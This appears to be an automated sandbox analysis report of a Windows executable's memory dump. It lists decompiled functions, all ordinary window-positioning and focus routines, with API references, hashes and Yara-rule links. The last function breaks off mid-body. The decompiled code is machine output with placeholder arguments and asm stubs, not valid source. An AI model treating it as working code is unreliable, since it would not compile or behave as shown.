Instruction ID: ad9c4c5a1cd1ba46cc1a51c0c8274d556f72b6c48cdc2387c30b37844363018f
Opcode Fuzzy Hash: ecd796a03a1bf8d7f912e6def723b700ee3b50c9dbf1fa4703c2640c3da3a0ac
Instruction Fuzzy Hash: 13E18D74A016099FEB50DF6AC4C199EF7F6EF58304B2885AAE804E7361C738ED45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043F680, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0043F680(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E00438310(_t43);
			}

0x0043f683
0x0043f686
0x0043f696
0x0043f6c5
0x0043f698
0x0043f698
0x0043f6ac
0x0043f6b7
0x0043f6b8
0x0043f6b9
0x0043f6ba
0x0043f6ba
0x0043f6dd
0x0043f6ed
0x0043f6f1
0x0043f6f5
0x0043f700
0x0043f700
0x0043f6f1
0x0043f708
0x0043f70f
0x0043f719
0x0043f724
0x0043f734

APIs

IsIconic.USER32 ref: 0043F68F
GetWindowPlacement.USER32(?,0000002C), ref: 0043F6AC
GetWindowRect.USER32 ref: 0043F6C5
GetWindowLongA.USER32 ref: 0043F6D3
GetWindowLongA.USER32 ref: 0043F6E8
ScreenToClient.USER32 ref: 0043F6F5
ScreenToClient.USER32 ref: 0043F700

Strings

,, xrefs: 0043F698

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: a12820155725a039876d4d8ccf419126c5743c9484ca125d043eaefec602398f
Instruction ID: 5ed748699de712c2db3d41d7aa240e43a43ddff179b1e4222cd5d2224f105c8f
Opcode Fuzzy Hash: a12820155725a039876d4d8ccf419126c5743c9484ca125d043eaefec602398f
Instruction Fuzzy Hash: B1118E71904201ABCB01EF6DC885A8B77D8AF4D354F044A3EFD58DB386EB39D9048B66

Uniqueness

Uniqueness Score: -1.00%

Function 00452548, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 284
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00452548(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				intOrPtr* _v24;
				void* __ebp;
				intOrPtr _t92;
				struct HWND__* _t93;
				struct HWND__* _t96;
				intOrPtr _t116;
				intOrPtr _t119;
				struct HWND__* _t125;
				struct HWND__* _t128;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t136;
				struct HWND__* _t138;
				struct HWND__* _t141;
				void* _t145;
				intOrPtr _t148;
				intOrPtr _t179;
				struct HDC__* _t184;
				intOrPtr* _t207;
				intOrPtr _t232;
				intOrPtr _t238;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				intOrPtr* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t207 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t263 = _t92 - 0x46;
				if(_t263 > 0) {
					_t93 = _t92 - 0xb01a;
					__eflags = _t93;
					if(_t93 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004037B0(_v8, __eflags);
						}
					} else {
						__eflags = _t93 == 1;
						if(_t93 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004037B0(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t116 = _v8;
						_t232 =  *0x452978; // 0x1
						__eflags = _t232 - ( *(_t116 + 0x1c) &  *0x452974);
						if(_t232 == ( *(_t116 + 0x1c) &  *0x452974)) {
							_t119 = _v8;
							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
								_t132 = _v8;
								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
								if( *((char*)(_t132 + 0x22b)) != 2) {
									_t133 =  *((intOrPtr*)(__edx + 8));
									_t26 = _t133 + 0x18;
									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								L30:
								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t128;
								if(_t128 == 0) {
									L32:
									 *( *((intOrPtr*)(_t207 + 8)) + 0x18) =  *( *((intOrPtr*)(_t207 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t128 == 3;
									if(_t128 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t125 == 2;
								if(_t125 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t96 = _t92 + 0xfffffffa - 3;
						if(_t96 < 0) {
							__eflags =  *0x471b18;
							if( *0x471b18 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t135 = _v8;
									__eflags =  *(_t135 + 0x1c) & 0x00000010;
									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t136 = _v8;
										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
										if( *((char*)(_t136 + 0x22f)) != 2) {
											_t138 =  *(_v8 + 0x220);
											__eflags = _t138;
											if(_t138 != 0) {
												__eflags = _t138 - _v8;
												if(_t138 != _v8) {
													_t255 = E0043F370(_t138);
												}
											}
										} else {
											_t141 = E00452DA8(_v8);
											__eflags = _t141;
											if(_t141 != 0) {
												_t255 = E0043F370(E00452DA8(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t96 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t145 = _t96 - 0x22;
							if(_t145 == 0) {
								_v24 =  *((intOrPtr*)(__edx + 8));
								__eflags =  *_v24 - 1;
								if( *_v24 != 1) {
									goto L43;
								} else {
									_t148 = _v8;
									__eflags =  *(_t148 + 0x248);
									if( *(_t148 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E0044BD54( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0041F908(0, 1);
											_push(_t258);
											_push(0x4527be);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x4527a1);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E004202C4(_v16,  *(_v24 + 0x18));
											E00420140(_v16);
											E0044D23C(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t238);
											 *[fs:eax] = _t238;
											_push(0x4527a8);
											__eflags = 0;
											E004202C4(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t145 == 1) {
									_t256 =  *((intOrPtr*)(__edx + 8));
									__eflags =  *_t256 - 1;
									if( *_t256 != 1) {
										goto L43;
									} else {
										_t179 = _v8;
										__eflags =  *(_t179 + 0x248);
										if( *(_t179 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E0044BD54( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t184 = E0043F370(_v8);
												L00406F30();
												_v20 = _t184;
												 *[fs:eax] = _t261;
												_v16 = E0041F908(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E004202C4(_v16, _v20);
												E00420140(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x4528a8, _t258,  *[fs:eax], 0x4528c5, _t258,  *[fs:eax], 0x4528ec, _t258, _t184);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x4528af);
												__eflags = 0;
												E004202C4(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 =  *_t207 -  *0x48fc08; // 0xc075
									if(_t267 == 0) {
										E00439EA4(_v8, 0, 0xb025, 0);
										E00439EA4(_v8, 0, 0xb024, 0);
										E00439EA4(_v8, 0, 0xb035, 0);
										E00439EA4(_v8, 0, 0xb009, 0);
										E00439EA4(_v8, 0, 0xb008, 0);
										E00439EA4(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t96 = E0043CE20(_v8, _t207);
									L44:
									return _t96;
								}
							}
						}
					}
				}
			}

0x00452549
0x0045254b
0x00452551
0x00452553
0x00452556
0x00452558
0x0045255b
0x00452580
0x00452580
0x00452585
0x00452631
0x00452638
0x00452645
0x00452645
0x0045258b
0x0045258b
0x0045258c
0x00452610
0x00452617
0x00452624
0x00452624
0x0045258e
0x00000000
0x0045258e
0x0045258c
0x00000000
0x0045255d
0x0045255d
0x0045264f
0x0045265d
0x00452664
0x00452667
0x0045266d
0x00452677
0x00452679
0x0045267b
0x0045267e
0x00452685
0x00452687
0x0045268a
0x0045268a
0x0045268a
0x0045268a
0x00452685
0x00452697
0x00452697
0x00452699
0x004526a3
0x004526ac
0x004526ac
0x004526ae
0x004526b8
0x004526bb
0x004526b0
0x004526b0
0x004526b2
0x00000000
0x00000000
0x004526b2
0x0045269b
0x0045269b
0x0045269d
0x00000000
0x00000000
0x0045269d
0x00452699
0x00000000
0x00452563
0x00452566
0x00452569
0x00452593
0x0045259a
0x004525a0
0x004525a3
0x00000000
0x004525a9
0x004525a9
0x004525ac
0x004525b0
0x00000000
0x004525b6
0x004525b6
0x004525b8
0x004525bb
0x004525c2
0x004525e4
0x004525ea
0x004525ec
0x004525ee
0x004525f1
0x004525f8
0x004525f8
0x004525f1
0x004525c4
0x004525c7
0x004525cc
0x004525ce
0x004525dd
0x004525dd
0x004525ce
0x004525fa
0x004525fc
0x00000000
0x00452602
0x00452603
0x00452603
0x004525fc
0x004525b0
0x004525a3
0x00000000
0x0045256b
0x0045256b
0x0045256e
0x004526c7
0x004526cd
0x004526d0
0x00000000
0x004526d6
0x004526d6
0x004526d9
0x004526e0
0x00000000
0x004526e6
0x004526fc
0x004526fe
0x00452700
0x00000000
0x00452706
0x00452712
0x00452717
0x00452718
0x0045271d
0x00452720
0x0045272f
0x00452734
0x00452735
0x0045273a
0x0045273d
0x00452749
0x0045275c
0x00452774
0x0045277b
0x0045277e
0x00452781
0x00452786
0x0045278b
0x004527a0
0x004527a0
0x00452700
0x004526e0
0x00452574
0x00452575
0x004527c5
0x004527c8
0x004527cb
0x00000000
0x004527d1
0x004527d1
0x004527d4
0x004527db
0x00000000
0x004527e1
0x004527f4
0x004527f6
0x004527f8
0x00000000
0x004527fe
0x00452801
0x00452807
0x0045280c
0x0045281a
0x00452829
0x00452837
0x00452843
0x00452851
0x0045285a
0x0045286d
0x00452880
0x00452885
0x00452888
0x0045288b
0x00452890
0x00452895
0x004528a7
0x004528a7
0x004527f8
0x004527db
0x0045257b
0x004528f3
0x004528f5
0x004528fb
0x00452909
0x0045291a
0x0045292b
0x0045293c
0x0045294d
0x0045295e
0x0045295e
0x00452963
0x00452968
0x0045296d
0x00452973
0x00452973
0x00452575
0x0045256e
0x00452569
0x0045255d

APIs

SetFocus.USER32(00000000), ref: 00452603
SaveDC.GDI32(?), ref: 0045272A
RestoreDC.GDI32(?,?), ref: 0045279B
7378B080.USER32(00000000), ref: 00452807
SaveDC.GDI32(?), ref: 0045283E
RestoreDC.GDI32(?,?), ref: 004528A2

Strings

p=C, xrefs: 00452708, 0045281F

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$7378B080Focus
String ID: p=C
API String ID: 1567250974-781052374
Opcode ID: c8e5d820128f35a17eaebf0df48eb3d56469817d5d770f31f2c97d5d6aa307bb
Instruction ID: 489ffc4e204c6dc215414bf0fa7de494ac8462d529e5455d1f5329be7db8c7a8
Opcode Fuzzy Hash: c8e5d820128f35a17eaebf0df48eb3d56469817d5d770f31f2c97d5d6aa307bb
Instruction Fuzzy Hash: B6B16074B00104EFCB14DF69C695AAE73F5EB0A705F5540A7E800AB362D7B8EE05DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004586A0, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004586A0(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E00457698( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0043F370( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00406D08();
						}
					}
					_t26 =  *0x48e5b4; // 0x48fa94
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x48e5b4; // 0x48fa94
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00453450(_t36, 0);
						E00455828( *((intOrPtr*)(_t51 + 0x44)));
					}
					E00457D14(_t51);
					_t21 =  *0x48fc00; // 0x2130f1c
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0043F370(_t55));
					}
					if( *((short*)(_t51 + 0x10a)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x108))();
					}
				}
				return _t21;
			}

0x004586a2
0x004586a8
0x004586af
0x004586b9
0x004586c2
0x004586fc
0x00458704
0x004586d3
0x004586e1
0x004586e3
0x00000000
0x004586e5
0x004586e5
0x004586e7
0x004586ec
0x004586f4
0x004586f5
0x004586f5
0x004586e3
0x00458711
0x0045871a
0x0045871c
0x0045871e
0x0045871e
0x00458724
0x0045872d
0x0045872f
0x00458731
0x00458731
0x0045873b
0x00458740
0x00458745
0x00458758
0x00458760
0x00458760
0x00458767
0x0045876c
0x00458771
0x00458776
0x00458780
0x00458780
0x0045878d
0x00000000
0x00458797
0x0045878d
0x0045879f

APIs

IsIconic.USER32 ref: 004586A8
SetActiveWindow.USER32(?,?,?,?,004580EA,00000000,0045858C), ref: 004586B9
IsWindowEnabled.USER32(00000000), ref: 004586DC
NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,004580EA,00000000,0045858C), ref: 004586F5
SetWindowPos.USER32(?,00000000,00000000,?,?,004580EA,00000000,0045858C), ref: 0045873B
SetFocus.USER32(00000000,?,00000000,00000000,?,?,004580EA,00000000,0045858C), ref: 00458780

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledFocusIconicNtdllProc_
String ID:
API String ID: 3996302123-0
Opcode ID: 27c15484ce4297f41ceb425cb8bb680fe46c224e471e1b033c15d14073fefb49
Instruction ID: 8af15a2fc43c48f92a1ec54e0d953763b45cd33a6a55fa418cb509a55d460a25
Opcode Fuzzy Hash: 27c15484ce4297f41ceb425cb8bb680fe46c224e471e1b033c15d14073fefb49
Instruction Fuzzy Hash: 3331D1707142409BEB14AB69DD85B6A27986F04705F18047AFD00EF2D7DE7CE848875D

Uniqueness

Uniqueness Score: -1.00%

Function 0043ED9C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0043ED9C(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043F674(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0043F674(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0043865C(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E00438310(_t52);
						return E004037B0(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}

0x0043eda5
0x0043eda7
0x0043eda9
0x0043edae
0x0043edc9
0x0043edd2
0x0043ee00
0x0043ee00
0x0043ee03
0x0043ee09
0x0043ee0f
0x0043ee14
0x0043ee19
0x0043ee1b
0x0043ee1d
0x0043ee2f
0x0043ee39
0x0043ee44
0x0043ee45
0x0043ee46
0x0043ee47
0x0043ee53
0x0043ee53
0x0043ee58
0x0043ee5a
0x00000000
0x0043ee65
0x0043eddb
0x0043ede0
0x0043ede2
0x00000000
0x00000000
0x0043edf9
0x00000000
0x0043edbd
0x0043edbd
0x0043edc3
0x0043ee70
0x0043ee70
0x00000000
0x0043edc3

APIs

IsIconic.USER32 ref: 0043EDDB
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043EDF9
GetWindowPlacement.USER32(?,0000002C), ref: 0043EE2F
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043EE53

Strings

,, xrefs: 0043EE1D

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 1e4a3a49f1a6b957df08a9d5391cf862449ffda888c5111ff213619f2a4f8f9d
Instruction ID: b34c0b2983a170d4d7faa89c5c5bfc29622552f7847272a02c6992c659ba1bbe
Opcode Fuzzy Hash: 1e4a3a49f1a6b957df08a9d5391cf862449ffda888c5111ff213619f2a4f8f9d
Instruction Fuzzy Hash: 7B213871600204ABCF54EF5AD8C5ADA77A8AF0D314F04547AFD14EF386D675DD048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004585F0, Relevance: 7.6, APIs: 5, Instructions: 59
nativewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004585F0(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E00457D04();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043F370( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E00457698( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E0043F370( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00406D08();
					}
					if( *((short*)(_t40 + 0x102)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x100))();
					}
				}
				return _t21;
			}

0x004585f2
0x004585f4
0x004585f8
0x004585ff
0x00458607
0x0045860c
0x00458610
0x00458619
0x0045867d
0x00458680
0x0045863c
0x00458640
0x00458652
0x00458658
0x0045865c
0x00458661
0x00458663
0x00458668
0x0045866d
0x0045866d
0x00458670
0x00458671
0x00458671
0x0045868d
0x00000000
0x00458697
0x0045868d
0x0045869f

APIs

IsIconic.USER32 ref: 004585F8
SetActiveWindow.USER32(00000000,00000000,?,?,00458C88), ref: 00458610
IsWindowEnabled.USER32(00000000), ref: 00458633
SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,00458C88), ref: 0045865C
NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00458671

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledIconicNtdllProc_
String ID:
API String ID: 1720852555-0
Opcode ID: 71a836c6cafcf50dc1dce313330eaed78997b95cbf3755771a93046c6f3efe6e
Instruction ID: 06e9175cf1c7f32ff4e542ee7d7a7b1df9cadbeded7b9642034c1a4e261fd295
Opcode Fuzzy Hash: 71a836c6cafcf50dc1dce313330eaed78997b95cbf3755771a93046c6f3efe6e
Instruction Fuzzy Hash: CC11D3716002009BDB54EF69D9C6B5637A8AF04305F08147AFE45EF297DA79EC888758

Uniqueness

Uniqueness Score: -1.00%

Function 00426BA4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00426BA4(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x48fabd != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E00426B14( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x48fa98; // 0x426ba4
				 *0x48fa98 = E004269A4(1, _t19, _t21, __edi, _t23);
				return  *0x48fa98(_t23, _t19);
			}

0x00426bac
0x00426baf
0x00426bb9
0x00426be3
0x00426bf4
0x00426c07
0x00426bf6
0x00426bfb
0x00426bfb
0x00000000
0x00426c11
0x00000000
0x00426be5
0x00426bc0
0x00426bcd
0x00000000

Strings

MonitorFromWindow, xrefs: 00426BBB

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: 1506d851f635075fd03fe839fcda1bb51d4943d6d9e81413673e2fb30f42dc65
Instruction ID: ad68316b27f70c4d8fdb2f21b7f2b593686ec712c708b88c350b3d109f0b6f20
Opcode Fuzzy Hash: 1506d851f635075fd03fe839fcda1bb51d4943d6d9e81413673e2fb30f42dc65
Instruction Fuzzy Hash: 9301DF717040386A8700EB92AC819BF735CDB01314B91047BED55D7641DB3C990587AD

Uniqueness

Uniqueness Score: -1.00%

Function 0045BDA0, Relevance: 6.2, APIs: 4, Instructions: 163
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0045BDA0(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v508;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _t75;
				intOrPtr _t91;
				char* _t97;
				signed int _t107;
				signed int _t114;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t146;
				int _t152;
				intOrPtr _t153;
				void* _t163;
				void* _t164;
				intOrPtr _t165;

				_t163 = _t164;
				_t165 = _t164 + 0xfffffde4;
				_v544 = 0;
				_v540 = 0;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				_t133 = __edx;
				_v8 = __eax;
				_push(_t163);
				_push(0x45c000);
				_push( *[fs:eax]);
				 *[fs:eax] = _t165;
				if(__edx >= 1) {
					E0045B868(_v8,  &_v528);
					if(E0040A964(_v528, _t133) == 1) {
						_t133 = _t133 - 1;
					}
				}
